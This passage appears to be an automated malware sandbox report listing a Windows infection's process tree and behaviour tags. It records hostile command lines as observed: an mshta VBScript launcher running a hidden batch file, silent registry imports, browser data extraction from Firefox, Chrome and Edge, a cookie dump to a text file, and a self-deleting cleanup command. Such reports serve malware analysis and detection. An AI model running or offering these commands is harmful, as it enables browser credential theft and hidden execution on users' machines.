        14⤵
        Suspicious use of SetWindowsHookEx
        
        PID:5440
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"
        15⤵
        Loads dropped DLL
        Suspicious use of SetWindowsHookEx
        
        PID:4392
        
        C:\Windows\regedit.exe
        
        regedit /s chrome.reg
        16⤵
        Runs .reg file with regedit
        
        PID:4356
        
        C:\Windows\SYSTEM32\TASKKILL.exe
        
        TASKKILL /F /IM chrome.exe
        16⤵
        Kills process with taskkill
        
        PID:4848
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chrome64.bat
        16⤵
        
        PID:3520
        
        C:\Windows\system32\mshta.exe
        
        mshta vbscript:createobject("wscript.shell").run("chrome64.bat h",0)(window.close)
        17⤵
        
        PID:5796
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX1\chrome64.bat" h"
        18⤵
        
        PID:2504
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:/Program Files/Google/Chrome/Application/chrome.exe"
        19⤵
        
        PID:4620
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xe0,0xe4,0xe8,0xbc,0xec,0x7ffab62a6e00,0x7ffab62a6e10,0x7ffab62a6e20
        20⤵
        
        PID:4352
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1600,13685891375307464860,16807065343382189717,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1660 /prefetch:8
        20⤵
        
        PID:5180
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1600,13685891375307464860,16807065343382189717,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1612 /prefetch:2
        20⤵
        
        PID:4656
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1600,13685891375307464860,16807065343382189717,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2232 /prefetch:8
        20⤵
        
        PID:5648
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1600,13685891375307464860,16807065343382189717,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2816 /prefetch:1
        20⤵
        
        PID:4452
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1600,13685891375307464860,16807065343382189717,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2824 /prefetch:1
        20⤵
        Checks SCSI registry key(s)
        Suspicious use of SetWindowsHookEx
        
        PID:2504
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1600,13685891375307464860,16807065343382189717,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3312 /prefetch:8
        20⤵
        
        PID:2164
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1600,13685891375307464860,16807065343382189717,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3692 /prefetch:1
        20⤵
        
        PID:6152
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1600,13685891375307464860,16807065343382189717,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3880 /prefetch:1
        20⤵
        
        PID:6172
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1600,13685891375307464860,16807065343382189717,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3544 /prefetch:1
        20⤵
        
        PID:4472
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1600,13685891375307464860,16807065343382189717,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4020 /prefetch:1
        20⤵
        
        PID:6236
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1600,13685891375307464860,16807065343382189717,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4188 /prefetch:8
        20⤵
        
        PID:6248
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1600,13685891375307464860,16807065343382189717,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4360 /prefetch:8
        20⤵
        
        PID:6348
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1600,13685891375307464860,16807065343382189717,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4176 /prefetch:8
        20⤵
        
        PID:6420
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1600,13685891375307464860,16807065343382189717,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4860 /prefetch:8
        20⤵
        
        PID:6724
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1600,13685891375307464860,16807065343382189717,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5132 /prefetch:8
        20⤵
        
        PID:6868
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1600,13685891375307464860,16807065343382189717,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3384 /prefetch:8
        20⤵
        
        PID:5456
        
        C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe
        
        "C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --force-configure-user-settings
        20⤵
        
        PID:4400
        
        C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe
        
        "C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff7850c7740,0x7ff7850c7750,0x7ff7850c7760
        21⤵
        
        PID:4496
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1600,13685891375307464860,16807065343382189717,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3868 /prefetch:8
        20⤵
        
        PID:6012
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1600,13685891375307464860,16807065343382189717,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5112 /prefetch:8
        20⤵
        
        PID:5232
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1600,13685891375307464860,16807065343382189717,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4220 /prefetch:8
        20⤵
        
        PID:6412
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1600,13685891375307464860,16807065343382189717,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4248 /prefetch:8
        20⤵
        
        PID:6772
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1600,13685891375307464860,16807065343382189717,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4000 /prefetch:8
        20⤵
        
        PID:6220
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1600,13685891375307464860,16807065343382189717,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3464 /prefetch:8
        20⤵
        
        PID:4760
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1600,13685891375307464860,16807065343382189717,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4956 /prefetch:8
        20⤵
        
        PID:6388
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1600,13685891375307464860,16807065343382189717,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4444 /prefetch:8
        20⤵
        
        PID:5128
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1600,13685891375307464860,16807065343382189717,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5232 /prefetch:8
        20⤵
        
        PID:7060
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1600,13685891375307464860,16807065343382189717,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4220 /prefetch:8
        20⤵
        
        PID:5140
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1600,13685891375307464860,16807065343382189717,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=780 /prefetch:8
        20⤵
        
        PID:6324
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1600,13685891375307464860,16807065343382189717,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4008 /prefetch:8
        20⤵
        
        PID:6868
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1600,13685891375307464860,16807065343382189717,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4624 /prefetch:8
        20⤵
        
        PID:4560
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1600,13685891375307464860,16807065343382189717,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3924 /prefetch:8
        20⤵
        
        PID:6212
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1600,13685891375307464860,16807065343382189717,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5472 /prefetch:8
        20⤵
        
        PID:6188
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1600,13685891375307464860,16807065343382189717,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5592 /prefetch:8
        20⤵
        
        PID:1856
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1600,13685891375307464860,16807065343382189717,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4172 /prefetch:8
        20⤵
        
        PID:4228
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1600,13685891375307464860,16807065343382189717,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5732 /prefetch:8
        20⤵
        
        PID:7096
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1600,13685891375307464860,16807065343382189717,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5728 /prefetch:8
        20⤵
        
        PID:4920
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1600,13685891375307464860,16807065343382189717,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5960 /prefetch:8
        20⤵
        
        PID:6824
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1600,13685891375307464860,16807065343382189717,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3356 /prefetch:8
        20⤵
        
        PID:6468
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1600,13685891375307464860,16807065343382189717,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2520 /prefetch:8
        20⤵
        
        PID:6632
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1600,13685891375307464860,16807065343382189717,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4040 /prefetch:8
        20⤵
        
        PID:1728
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1600,13685891375307464860,16807065343382189717,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4696 /prefetch:8
        20⤵
        
        PID:808
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1600,13685891375307464860,16807065343382189717,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3596 /prefetch:1
        20⤵
        
        PID:6656
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1600,13685891375307464860,16807065343382189717,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4704 /prefetch:8
        20⤵
        
        PID:3464
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1600,13685891375307464860,16807065343382189717,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6168 /prefetch:8
        20⤵
        
        PID:6680
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1600,13685891375307464860,16807065343382189717,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6176 /prefetch:8
        20⤵
        
        PID:2444
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1600,13685891375307464860,16807065343382189717,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4680 /prefetch:8
        20⤵
        
        PID:6308
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1600,13685891375307464860,16807065343382189717,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6568 /prefetch:8
        20⤵
        
        PID:6588
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1600,13685891375307464860,16807065343382189717,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3456 /prefetch:8
        20⤵
        
        PID:6476
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1600,13685891375307464860,16807065343382189717,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6760 /prefetch:8
        20⤵
        
        PID:5784
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1600,13685891375307464860,16807065343382189717,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6936 /prefetch:1
        20⤵
        
        PID:5008
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1600,13685891375307464860,16807065343382189717,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3344 /prefetch:8
        20⤵
        
        PID:4292
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1600,13685891375307464860,16807065343382189717,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6932 /prefetch:8
        20⤵
        
        PID:4420
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1600,13685891375307464860,16807065343382189717,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5808 /prefetch:8
        20⤵
        
        PID:4576
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1600,13685891375307464860,16807065343382189717,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5976 /prefetch:8
        20⤵
        
        PID:6744
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1600,13685891375307464860,16807065343382189717,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4412 /prefetch:8
        20⤵
        
        PID:2932
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1600,13685891375307464860,16807065343382189717,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3916 /prefetch:8
        20⤵
        
        PID:6972
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1600,13685891375307464860,16807065343382189717,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5204 /prefetch:1
        20⤵
        
        PID:6880
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1600,13685891375307464860,16807065343382189717,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4752 /prefetch:8
        20⤵
        
        PID:4792
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1600,13685891375307464860,16807065343382189717,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7152 /prefetch:8
        20⤵
        
        PID:5716
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1600,13685891375307464860,16807065343382189717,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=MAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAIAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=4220 /prefetch:2
        20⤵
        
        PID:7152
        
        C:\Windows\regedit.exe
        
        regedit /s chrome-set.reg
        16⤵
        Runs .reg file with regedit
        
        PID:6396
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
        
        parse.exe -f json -b firefox
        16⤵
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetWindowsHookEx
        
        PID:5344
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
        
        parse.exe -f json -b chrome
        16⤵
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetWindowsHookEx
        
        PID:6496
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
        
        parse.exe -f json -b edge
        16⤵
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetWindowsHookEx
        
        PID:4548
        
        C:\Users\Admin\AppData\Local\Temp\is-8UHRH.tmp\Delta.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-8UHRH.tmp\Delta.exe" /Verysilent
        12⤵
        Suspicious use of SetWindowsHookEx
        
        PID:5032
        
        C:\Users\Admin\AppData\Local\Temp\is-1GJ1K.tmp\Delta.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-1GJ1K.tmp\Delta.tmp" /SL5="$5049C,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-8UHRH.tmp\Delta.exe" /Verysilent
        13⤵
        Loads dropped DLL
        Suspicious use of SetWindowsHookEx
        
        PID:5528
        
        C:\Users\Admin\AppData\Local\Temp\is-OEVVE.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-OEVVE.tmp\Setup.exe" /VERYSILENT
        14⤵
        Loads dropped DLL
        Checks processor information in registry
        Suspicious use of SetWindowsHookEx
        
        PID:4936
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-OEVVE.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit
        15⤵
        
        PID:7072
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im Setup.exe /f
        16⤵
        Kills process with taskkill
        
        PID:4824
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        16⤵
        Delays execution with timeout.exe
        
        PID:6000
        
        C:\Users\Admin\AppData\Local\Temp\is-8UHRH.tmp\zznote.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-8UHRH.tmp\zznote.exe" /Verysilent
        12⤵
        Suspicious use of SetWindowsHookEx
        
        PID:4700
        
        C:\Users\Admin\AppData\Local\Temp\is-O5783.tmp\zznote.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-O5783.tmp\zznote.tmp" /SL5="$6049C,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-8UHRH.tmp\zznote.exe" /Verysilent
        13⤵
        Loads dropped DLL
        Suspicious use of SetWindowsHookEx
        
        PID:4944
        
        C:\Users\Admin\AppData\Local\Temp\is-RQGH4.tmp\jg4_4jaa.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-RQGH4.tmp\jg4_4jaa.exe" /silent
        14⤵
        Checks whether UAC is enabled
        Suspicious use of SetWindowsHookEx
        
        PID:208
        
        C:\Users\Admin\AppData\Local\Temp\is-8UHRH.tmp\hjjgaa.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-8UHRH.tmp\hjjgaa.exe" /Verysilent
        12⤵
        Suspicious use of SetWindowsHookEx
        
        PID:6368
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        13⤵
        Suspicious use of SetWindowsHookEx
        
        PID:6832
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        13⤵
        Suspicious use of SetWindowsHookEx
        
        PID:6952
        
        C:\Users\Admin\AppData\Local\Temp\ozjolj5sxl4\chashepro3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ozjolj5sxl4\chashepro3.exe" /VERYSILENT
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:4816
        
        C:\Users\Admin\AppData\Local\Temp\is-D6BF9.tmp\chashepro3.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-D6BF9.tmp\chashepro3.tmp" /SL5="$103A4,2012497,58368,C:\Users\Admin\AppData\Local\Temp\ozjolj5sxl4\chashepro3.exe" /VERYSILENT
        9⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        
        PID:4796
        
